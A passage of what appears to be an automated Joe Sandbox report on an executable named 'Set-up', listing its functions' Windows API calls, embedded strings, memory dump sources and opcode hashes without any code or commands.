                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000004,00000002), ref: 00E4E8CA
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000004,00000001), ref: 00E4E939
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000004,00000001), ref: 00E4E952
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionMask$ErrorLastLibrary$Load$CompareDirectoryExchangeFreeHandleInterlockedModuleSystem
                                                                                                                                  • String ID: !af_ && length()$4$GetFileVersionInfoSizeW$GetFileVersionInfoW$NetApiBufferFree$NetWkstaGetInfo$VerQueryValueW$basic_ncstring<wchar_t>::back$kernel32.dll$netapi32.dll$version.dll
                                                                                                                                  • API String ID: 2630566882-2361735218
                                                                                                                                  • Opcode ID: 3525aeb30ed8c3b0b581bb21adcefc57ec6141f54de53d60154f39cd6a285c37
                                                                                                                                  • Instruction ID: a190f3838e520e3359c509f3fe16a565e50033890409a9bbf022316e3dc40a3c
                                                                                                                                  • Opcode Fuzzy Hash: 3525aeb30ed8c3b0b581bb21adcefc57ec6141f54de53d60154f39cd6a285c37
                                                                                                                                  • Instruction Fuzzy Hash: 24524070A012289BDB38DB24DC89BEEB7B5BB59704F1050E9E649B7381DBB45E84CF50
                                                                                                                                  Function 00E44630 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 352threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                  • DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,, PID ,00000006,9.39,00000004,', version ,?,00000000,Ensure check failed in module ',0000001F,-000000C7), ref: 00E447C5
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E44809
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4498E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E449BE
                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00E44A51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentException@8Throw$BreakConcurrency::cancel_current_taskDebugDebuggerFileModuleNamePresentProcessThread___std_exception_copy
                                                                                                                                  • String ID: ', line $', version $, PID $, TID $, function '$9.39$Call stack:$Ensure check failed in module '
                                                                                                                                  • API String ID: 1077365137-295359884
                                                                                                                                  • Opcode ID: 61a30823a19c80ace10a5ee442747480f99736149de509f3be1c39df3fecf659
                                                                                                                                  • Instruction ID: bc4c9255e1753098582f9bf74aed3310b4df230077d73db557535375a0f1f112
                                                                                                                                  • Opcode Fuzzy Hash: 61a30823a19c80ace10a5ee442747480f99736149de509f3be1c39df3fecf659
                                                                                                                                  • Instruction Fuzzy Hash: 09D1BEB1A01218AFDB25DF64EC45BEAB7F8AF15304F544198F509B72D1DB70AA48CF90
                                                                                                                                  Function 00E61F70 Relevance: 28.8, APIs: 12, Strings: 4, Instructions: 764COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E61FC2
                                                                                                                                    • Part of subcall function 00E63CF0: EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E63D29
                                                                                                                                    • Part of subcall function 00E63CF0: WideCharToMultiByte.KERNEL32(00000000,00000400,01307E00,00000001,?,00000001,?,00000000), ref: 00E63D81
                                                                                                                                    • Part of subcall function 00E63CF0: WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF8,00000001,?,00000001,0000003F,00000000), ref: 00E63DBC
                                                                                                                                    • Part of subcall function 00E63CF0: WideCharToMultiByte.KERNEL32(00000000,00000400,01307DFC,00000001,?,00000001,0000003F,00000000), ref: 00E63DF8
                                                                                                                                    • Part of subcall function 00E63CF0: WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF0,00000001,?,00000001,0000003F,00000000), ref: 00E63E2F
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                  • GetConsoleOutputCP.KERNEL32(?), ref: 00E6203D
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E62140
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6217B
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E622B3
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E622EE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E62452
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6248B
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6267F
                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?), ref: 00E626F8
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8,?), ref: 00E62771
                                                                                                                                  Strings
                                                                                                                                  • !af_ && i<length(), xrefs: 00E62439
                                                                                                                                  • NumCast, xrefs: 00E62797
                                                                                                                                  • basic_ncstring<wchar_t>::operator [], xrefs: 00E62434
                                                                                                                                  • value <= std::numeric_limits<OutType>::max(), xrefs: 00E6279C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task$CriticalSection$ByteCharMultiWide$Enter$ConsoleLeave$BufferInfoOutputScreen
                                                                                                                                  • String ID: !af_ && i<length()$NumCast$basic_ncstring<wchar_t>::operator []$value <= std::numeric_limits<OutType>::max()
                                                                                                                                  • API String ID: 3864998577-1646068431
                                                                                                                                  • Opcode ID: 05f03513a2ed5d47ecb774a6e65771fa0b5e783c0b7e803885bb75e11b87de8e
                                                                                                                                  • Instruction ID: 7fe86ac46bc0d5af8f9dcab80c510882ce03db03dc63bcab5d4163a6ae668b7f
                                                                                                                                  • Opcode Fuzzy Hash: 05f03513a2ed5d47ecb774a6e65771fa0b5e783c0b7e803885bb75e11b87de8e
                                                                                                                                  • Instruction Fuzzy Hash: 1642F530A84A198EDF28CB74E894BBEB7F5AF10394F14662DD626F72D0DB349981C750
                                                                                                                                  Function 00E8C970 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 429processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,460C02D8,?,00000000), ref: 00E8C9B7
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00E8CA33
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E8CA50
                                                                                                                                  • PathIsPrefixW.SHLWAPI(00000000,?,?,?,?,?,?,?,00000000), ref: 00E8CB88
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E8CC5C
                                                                                                                                    • Part of subcall function 00E488C0: GetLastError.KERNEL32 ref: 00E488FA
                                                                                                                                    • Part of subcall function 00E488C0: CloseHandle.KERNEL32(00720043), ref: 00E48919
                                                                                                                                    • Part of subcall function 00E488C0: SetLastError.KERNEL32(00000000), ref: 00E48932
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000000), ref: 00E8CFE5
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E8D014
                                                                                                                                    • Part of subcall function 00E6A6D0: new.LIBCMT ref: 00E6A6FD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Process32$CloseCreateCurrentException@8FirstHandleNextPathPrefixProcessSnapshotThrowToolhelp32
                                                                                                                                  • String ID: !af_$!af_ && i<s_$CreateToolhelp32Snapshot()$datavect<unsigned long *>::operator []$datavect<unsigned long *>::size$ncvector<unsigned long>::operator []
                                                                                                                                  • API String ID: 1675070532-1998510845
                                                                                                                                  • Opcode ID: df1857c6406994e453dfc9450cbfd0ef9d460d837e8c7b27394d85408861523e
                                                                                                                                  • Instruction ID: 332718968106c3ba429a9b97f49257c365ddb15e6459af47906abb249f4532ef
                                                                                                                                  • Opcode Fuzzy Hash: df1857c6406994e453dfc9450cbfd0ef9d460d837e8c7b27394d85408861523e
                                                                                                                                  • Instruction Fuzzy Hash: AB126DB1A002589FDB24DF14CD44B9DBBB5AF46308F1450E9D60DB7282DB716E88CF65
                                                                                                                                  Function 058E1277 Relevance: 21.0, Strings: 16, Instructions: 953COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,$.$0$0$0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                                                                  • API String ID: 0-592371532
                                                                                                                                  • Opcode ID: 62d7f093094b33026935579788bb0f83e9a85cd3b20d97f04cad85cc92ca6094
                                                                                                                                  • Instruction ID: 5a565eb994c09b88593eadd94ecec04f272464d0dfa83661e866a536dd34884f
                                                                                                                                  • Opcode Fuzzy Hash: 62d7f093094b33026935579788bb0f83e9a85cd3b20d97f04cad85cc92ca6094
                                                                                                                                  • Instruction Fuzzy Hash: 5472B0756093418FD314CE28C48076ABBF6BB8A204F188A6DEC9BD7391D775DD05CB82
                                                                                                                                  Function 059037F8 Relevance: 14.2, Strings: 11, Instructions: 416COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: }0C$ke$BM$QD$lo$#=$'!$ga$sRm$wq$}{
                                                                                                                                  • API String ID: 0-4000922688
                                                                                                                                  • Opcode ID: 915122c7f8618750c46a0e0caa564b6e86f407211bfd103f5e4755bf4bac5061
                                                                                                                                  • Instruction ID: ada1efce72b9fcc5709234768627ea3d58c3078a5bcecdd8401c4772cf5d6054
                                                                                                                                  • Opcode Fuzzy Hash: 915122c7f8618750c46a0e0caa564b6e86f407211bfd103f5e4755bf4bac5061
                                                                                                                                  • Instruction Fuzzy Hash: 0132B8B410D3858AE274CF259586BCFBBE1BB92344F208D1DD2E99B255DB708186CF93
                                                                                                                                  Function 05916B30 Relevance: 14.1, Strings: 11, Instructions: 322COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $0$0$1$1$2$2$D$E$J$P
                                                                                                                                  • API String ID: 0-1153050706
                                                                                                                                  • Opcode ID: a33acdf0239a95babaf2afd5ccf81056757fbd8e264ca0ad47a45dd708770055
                                                                                                                                  • Instruction ID: 4ffc16c6ae8093835988e47cc70ea7f84d5a597c9dea6ad8510fa6f4418123ce
                                                                                                                                  • Opcode Fuzzy Hash: a33acdf0239a95babaf2afd5ccf81056757fbd8e264ca0ad47a45dd708770055
                                                                                                                                  • Instruction Fuzzy Hash: 21B13663A0D7E04AD311857C8C8435BAEC75BE6134F1D8BADE9E1C77C2D5A9C8068397
                                                                                                                                  Function 00E62C50 Relevance: 13.0, APIs: 2, Strings: 6, Instructions: 981COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?,?), ref: 00E62CC1
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Enter$Leave
                                                                                                                                  • String ID: !af_ && i<length()$1$NumCast$basic_ncstring<wchar_t>::operator []$value <= (InType) std::numeric_limits<OutType>::max()$value >= 0
                                                                                                                                  • API String ID: 2801635615-1729119799
                                                                                                                                  • Opcode ID: aebd92225cf6b71c560fc8bd5d6709f071cb81449285d681ea8118c08a137179
                                                                                                                                  • Instruction ID: 6bf088f10a211e572d16eb21fbec52e9abfad061bd659c861e03e9331782d12c
                                                                                                                                  • Opcode Fuzzy Hash: aebd92225cf6b71c560fc8bd5d6709f071cb81449285d681ea8118c08a137179
                                                                                                                                  • Instruction Fuzzy Hash: 27929C71E002589FDF24DFA4D854BEEBBB4AF14344F145199E40ABB281DB70AE88CF91
                                                                                                                                  Function 058E13E4 Relevance: 11.7, Strings: 9, Instructions: 457COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -$.$0123456789ABCDEFXP$0123456789abcdefxp$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-3824892235
                                                                                                                                  • Opcode ID: f5f721cf1db68718feca4f7007a69207216d13077a2f07e9a5abd9cc7ffe5d7d
                                                                                                                                  • Instruction ID: 47514dcb76b054c9a33e4c4a16027c054851608476d15250f7441c9306442efd
                                                                                                                                  • Opcode Fuzzy Hash: f5f721cf1db68718feca4f7007a69207216d13077a2f07e9a5abd9cc7ffe5d7d
                                                                                                                                  • Instruction Fuzzy Hash: 5CF1B075A0D7418FC318CE29C49066AFBE2BBCA304F088A2DE99AD7391D775DD05CB42
                                                                                                                                  Function 058E1000 Relevance: 11.5, Strings: 8, Instructions: 1494COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $ $ $ $ $ $ $@
                                                                                                                                  • API String ID: 0-1229966368
                                                                                                                                  • Opcode ID: 91f5bc4ce1c782f9eae9c5e52da583c4dc7e95ea3cf622b8983e9fb26c5c4050
                                                                                                                                  • Instruction ID: 7b40b8c2e56118e5d7c45ea6707c93bdcba8a440bc6f05669d9539ccab897de1
                                                                                                                                  • Opcode Fuzzy Hash: 91f5bc4ce1c782f9eae9c5e52da583c4dc7e95ea3cf622b8983e9fb26c5c4050
                                                                                                                                  • Instruction Fuzzy Hash: 11B2D4756083519FC719CE28C89062ABBF3BBD6214F188A6DEC96CB351DB75EC05CB81
                                                                                                                                  Function 00E55DD0 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 483COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$datavect<class CmdLine::ItemData *>::size$datavect<unsigned int *>::size$help$ncvector<class CmdLine::ItemData>::end
                                                                                                                                  • API String ID: 0-595236504
                                                                                                                                  • Opcode ID: de522ea14a093871e5117763ed827ac5793fb96c335aed55d2aa4457e1c20c5b
                                                                                                                                  • Instruction ID: ab775c4d99d46148241333155dd33245dcf030d859714f107766a388850195d8
                                                                                                                                  • Opcode Fuzzy Hash: de522ea14a093871e5117763ed827ac5793fb96c335aed55d2aa4457e1c20c5b
                                                                                                                                  • Instruction Fuzzy Hash: 9D0278B1A01208AFDB24CF98C995BDEBBF4EF04314F108519E955BB3D1D776AA09CB90
                                                                                                                                  Function 058F4E66 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 417COMMON
                                                                                                                                  Download Yara Rule
